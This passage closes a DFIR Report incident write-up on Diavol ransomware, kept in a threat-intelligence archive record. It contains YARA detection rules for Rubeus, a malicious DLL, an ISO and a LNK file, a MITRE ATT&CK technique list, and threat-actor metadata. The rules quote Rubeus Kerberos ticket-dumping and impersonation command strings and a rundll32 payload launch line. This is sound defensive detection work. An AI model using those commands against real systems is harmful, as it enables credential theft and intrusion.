\"'s%k/m\u0026k\u0026l\u0026m0u$s(m0s*n(n0v)y(r-w,y%u,j.k,y\u0026q'r!t-t)t%r\\\"k)o!o0l\u0026t%s%r%y!x-q*u$o\u0026w#l)r\u0026p\u0026s/u*p$w\u0026o'\r\n $s17 = \"\\\"k+m+y+x+w'y(y0t$l\u0026v*y0t$x(w$j0m-s\u0026j(l%k%l%m-p)l$n\u0026p!x#o!n$n!q-q\u0026v\\\"t%j%t%w!o.r*u\\\"s*k,q\u0026k\\\"q+u%y\r\n $s18 = \"(k%m+w*w(p#s'r-p+n\u0026r0t-o%t%u$l+l\u0026k!x-v%k%l(u%m%u%k%j%q-o)x,u-j)o+k't,j,k,l-q*j,s%l,r-t#o+t+u*v\u0026t\u0026j\r\n $s19 = \"$t#j/v)l%w#n0j!u'k(j$y0w+v!j%r%s,j%k(n!j's%y.k%t)t%m\\\"q0s-n)q#y!r!s%j)l\u0026v!s$q\\\"r'x0y\u0026r*v\u0026w!o0v)x!v\r\n $s20 = \"#t%n)y/q#p(n$r%j0r)u(y-l+o0v$j's\u0026k)t\u0026q%k%l$s)m%w-n0l%q%p%o0v.r'x!j.t,r+j-j(j%o.s%l*k+r\u0026l+t*p.j*w*r\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n ( pe.imphash() == \"1a4ea0d6f08424c00bbeb4790cdf1ca7\" and ( pe.exports(\"GhlqallxvchxEpmvydvyzqt\") and pe.ex\r\n}\r\nrule files_Rubeus {\r\n meta:\r\n description = \"8099 - file Rubeus.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-12-12\"\r\n hash1 = \"0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb\"\r\n strings:\r\n $x1 = \" Rubeus.exe dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/\r\n $x2 = \" Rubeus.exe asktgt /user:USER \u003c/password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HA\r\n $x3 = \"[!] GetSystem() - OpenProcessToken failed!\" fullword wide\r\n $x4 = \" Rubeus.exe createnetonly /program:\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" [/show]\" fullword wide\r\n $x5 = \"[!] GetSystem() - ImpersonateLoggedOnUser failed!\" fullword wide\r\n $x6 = \"[X] You need to have an elevated context to dump other users' Kerberos tickets :( \" fullword wide\r\n $x7 = \"[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'\" fullword wide\r\n $x8 = \" Dump all current ticket data (if elevated, dump for all users), optionally targeting a specific\r\n $s9 = \"Z:\\\\Agressor\\\\github.com-GhostPack\\\\Rubeus-master\\\\Rubeus\\\\obj\\\\Debug\\\\Rubeus.pdb\" fullword ascii\r\n $s10 = \" Triage all current tickets (if elevated, list for all users), optionally targeting a specific\r\n $s11 = \"[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\" fullword wide\r\n $s12 = \"Action: Dump Kerberos Ticket Data (All Users)\" fullword wide\r\n $s13 = \"[*] Initializing Kerberos GSS-API w/ fake delegation for target '{0}'\" fullword wide\r\n $s14 = \"[*] Listing statistics about target users, no ticket requests being performed.\" fullword wide\r\n $s15 = \"[X] OpenProcessToken error: {0}\" fullword wide\r\n $s16 = \"[X] CreateProcessWithLogonW error: {0}\" fullword wide\r\n $s17 = \"[*] Target service : {0:x}\" fullword wide\r\n $s18 = \"[*] Target Users : {0}\" fullword wide\r\n $s19 = \" Rubeus.exe s4u /user:USER \u003c/rc4:HASH | /aes256:HASH\u003e [/domain:DOMAIN] \u003c/impersonateuser:US\r\n $s20 = \" List all current tickets in detail (if elevated, list for all users), optionally targeting a s\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 700KB and\r\n 1 of ($x*) and 4 of them\r\n}\r\nrule SharedFiles {\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 34 of 38\n\nmeta:\r\n description = \"8099 - file SharedFiles.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-12-12\"\r\n hash1 = \"c17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299\"\r\n strings:\r\n $s1 = \"ButtonSkin.dll\" fullword wide\r\n $s2 = \"MyLinks.dll\" fullword wide\r\n $s3 = \"DragListCtrl.dll\" fullword ascii\r\n $s4 = \"whoami.exe\" fullword ascii\r\n $s5 = \"constructor or from DllMain.\" fullword ascii\r\n $s6 = \"DINGXXPADDINGPADDINGXXPADDINGPADD\" fullword ascii\r\n $s7 = \"kLV -{T\" fullword ascii\r\n $s8 = \"CtrlList1\" fullword wide\r\n $s9 = \"CtrlList2\" fullword wide\r\n $s10 = \"CtrlList3\" fullword wide\r\n $s11 = \"wox)YytbACl_\u003cme*y3X(*lNCvY@8jsbePLfVHH!X2p2TdHa6+1hoo^1N7gNtwhki)Lbaso@*ne7\" fullword ascii\r\n $s12 = \"QX[gbL\" fullword ascii /* Goodware String - occured 1 times */\r\n $s13 = \"BasicScore\" fullword ascii\r\n $s14 = \".?AVCDemoDlg@@\" fullword ascii\r\n $s15 = \"jLDfSektRC2FrOiWNzhbH3AsmBEIwg1U\" fullword ascii\r\n $s16 = \"9t$xt5\" fullword ascii /* Goodware String - occured 1 times */\r\n $s17 = \"DeAj1=n\" fullword ascii\r\n $s18 = \"WmaK|IG\" fullword ascii\r\n $s19 = \"oTRHz`R\" fullword ascii\r\n $s20 = \"VWATAUAVAWLc\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n ( pe.imphash() == \"c270086ea8ef591ab09b6ccf85dc6072\" and pe.exports(\"BasicScore\") or 8 of them )\r\n}\r\nrule new_documents_2005_iso {\r\n meta:\r\n description = \"8099 - file new-documents-2005.iso\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-29\"\r\n hash1 = \"1de1336e311ba4ab44828420b4f876d173634670c0b240c6cca5babb1d8b0723\"\r\n strings:\r\n $x1 = \"SharedFiles.dll,BasicScore\\\"%systemroot%\\\\system32\\\\imageres.dll\" fullword wide\r\n $s2 = \"C:\\\\Windows\\\\System32\\\\rundll32.exe\" fullword ascii\r\n $s3 = \"SHAREDFI.DLL\" fullword ascii\r\n $s4 = \"SharedFiles.dll\" fullword wide\r\n $s5 = \"C:\\\\Users\\\\User\\\\Documents\" fullword wide\r\n $s6 = \"DragListCtrl.dll\" fullword ascii\r\n $s7 = \"MyLinks.dll\" fullword wide\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 35 of 38\n\n$s8 = \"ButtonSkin.dll\" fullword wide\r\n $s9 = \"whoami.exe\" fullword ascii\r\n $s10 = \" ..\\\\Windows\\\\System32\\\\rundll32.exe\" fullword wide\r\n $s11 = \"User (C:\\\\Users)\" fullword wide\r\n $s12 = \" \" fullword ascii\r\n $s13 = \"DOCUMENT.LNK\" fullword ascii\r\n $s14 = \"Documents.lnk@\" fullword wide\r\n $s15 = \",System32\" fullword wide\r\n $s16 = \" Type Descriptor'\" fullword ascii\r\n $s17 = \" constructor or from DllMain.\" fullword ascii\r\n $s18 = \" \" fullword ascii\r\n $s19 = \"DINGXXPADDINGPADDINGXXPADDINGPADD\" fullword ascii\r\n $s20 = \" Class Hierarchy Descriptor'\" fullword ascii\r\n condition:\r\n uint16(0) == 0x0000 and filesize \u003c 2000KB and\r\n 1 of ($x*) and 4 of them\r\n}\r\nrule files_tmp {\r\n meta:\r\n description = \"8099 - file tmp.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-12-12\"\r\n hash1 = \"493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54\"\r\n strings:\r\n $s1 = \"UncategorizedOtherOutOfMemoryUnexpectedEofInterruptedArgumentListTooLongFilenameTooLongTooManyLinks\r\n $s2 = \"uncategorized errorother errorout of memoryunexpected end of fileunsupportedoperation interruptedar\r\n $s3 = \"kuiiqaiusmlytqxxnrtl.dll\" fullword ascii\r\n $s4 = \"Node.js API crypto.randomFillSync is unavailableNode.js crypto module is unavailablerandSecure: VxW\r\n $s5 = \"ctoryoperation would blockentity already existsbroken pipenetwork downaddress not availableaddress\r\n $s6 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n $s7 = \"keyed events not availableC:rtzkoqhrehbskobagkzngetniywbivatkcfmkxxumjxevfohiuxtzrkjoopvcwassaovngx\r\n $s8 = \"keyed events not availableC:rtzkoqhrehbskobagkzngetniywbivatkcfmkxxumjxevfohiuxtzrkjoopvcwassaovngx\r\n $s9 = \"attempted to index slice from after maximum usizeattempted to index slice up to maximum usizeassert\r\n $s10 = \"attempted to zero-initialize type `alloc::string::String`, which is invalidassertion failed: 0 \u003c p\r\n $s11 = \"attempted to zero-initialize type `\u0026str`, which is invalidassertion failed: 0 \u003c pointee_size \u0026\u0026 po\r\n $s12 = \"attempted to zero-initialize type `\u0026str`, which is invalidassertion failed: 0 \u003c pointee_size \u0026\u0026 po\r\n $s13 = \"rno: did not return a positive valuegetrandom: this target is not supportedC:ehpgbcedommleqfhulhfn\r\n $s14 = \"attempted to zero-initialize type `(*mut u8, unsafe extern \\\"C\\\" fn(*mut u8))`, which is invalidas\r\n $s15 = \"attempted to index slice from after maximum usizeattempted to index slice up to maximum usizeasser\r\n $s16 = \"attempted to zero-initialize type `alloc::string::String`, which is invalidassertion failed: 0 \u003c p\r\n $s17 = \"workFileHandleFilesystemLoopReadOnlyFilesystemDirectoryNotEmptyIsADirectoryNotADirectoryWouldBlock\r\n $s18 = \"abortednetwork unreachablehost unreachableconnection resetconnection refusedpermission deniedentit\r\n $s19 = \"thread panicked while processing panic. aborting.\" fullword ascii\r\n $s20 = \"internal_codedescription0\" fullword ascii\r\n condition:\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 36 of 38\n\nuint16(0) == 0x5a4d and filesize \u003c 5000KB and\r\n ( pe.imphash() == \"59e16a2afa5b682bb9692bac873fa10c\" and ( pe.exports(\"EnterDll\") and pe.exports(\"alpjxrie\r\n}\r\nrule Documents {\r\n meta:\r\n description = \"8099 - file Documents.lnk\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-12-12\"\r\n hash1 = \"e87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162\"\r\n strings:\r\n $x1 = \"SharedFiles.dll,BasicScore\\\"%systemroot%\\\\system32\\\\imageres.dll\" fullword wide\r\n $x2 = \"C:\\\\Windows\\\\System32\\\\rundll32.exe\" fullword ascii\r\n $s3 = \"C:\\\\Users\\\\User\\\\Documents\" fullword wide\r\n $s4 = \" ..\\\\Windows\\\\System32\\\\rundll32.exe\" fullword wide\r\n $s5 = \"User (C:\\\\Users)\" fullword wide\r\n $s6 = \",System32\" fullword wide\r\n $s7 = \"Documents\" fullword wide /* Goodware String - occured 89 times */\r\n $s8 = \"windev2106eval\" fullword ascii\r\n $s9 = \"%Windows\" fullword wide /* Goodware String - occured 2 times */\r\n $s10 = \"OwHUSx\" fullword ascii\r\n $s11 = \"System Folder\" fullword wide /* Goodware String - occured 5 times */\r\n condition:\r\n uint16(0) == 0x004c and filesize \u003c 3KB and\r\n 1 of ($x*) and all of them\r\n}\r\nMITRE\r\nSpearphising Link – T1566.002\r\nBITS Jobs – T1197\r\nKerberoasting – T1558.003\r\nAS-REP Roasting – T1558.004\r\nCredentials in Registry – T1552.002\r\nRemote Desktop Protocol – T1021.001\r\nExfiltration to Cloud Storage – T1567.002\r\nOS Credential Dumping – T1003\r\nSMB/Windows Admin Shares – T1021.002\r\nSystem Owner/User Discovery – T1033\r\nNetwork Service Scanning – T1046\r\nProcess Injection – T1055\r\nPowerShell – T1059.001\r\nDomain Groups – T1069.002\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 37 of 38\n\nFile and Directory Discovery – T1083\r\nAccess Token Manipulation – T1134\r\nNetwork Share Discovery – T1135\r\nDomain Trust Discovery – T1482\r\nData Encrypted for Impact – T1486\r\nDisable or Modify Tools – T1562.001\r\nValid Accounts – T1078\r\nInternal case #8099\r\nSource: https://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 38 of 38\n\n https://thedfirreport.com/2021/12/13/diavol-ransomware/ \nComparing compiled version to executable from this intrusion\nBefore execution of AdFind.exe, adf.bat was run. \n Page 19 of 38", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia" ], "origins": [ "web" ], "references": [ "https://thedfirreport.com/2021/12/13/diavol-ransomware/" ], "report_names": [ "diavol-ransomware" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434247, "ts_updated_at": 1775826683, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3b407c56de2595ffddfc27a8e91ce2ded96d9b18.pdf", "text": "https://archive.orkl.eu/3b407c56de2595ffddfc27a8e91ce2ded96d9b18.txt", "img": "https://archive.orkl.eu/3b407c56de2595ffddfc27a8e91ce2ded96d9b18.jpg" } }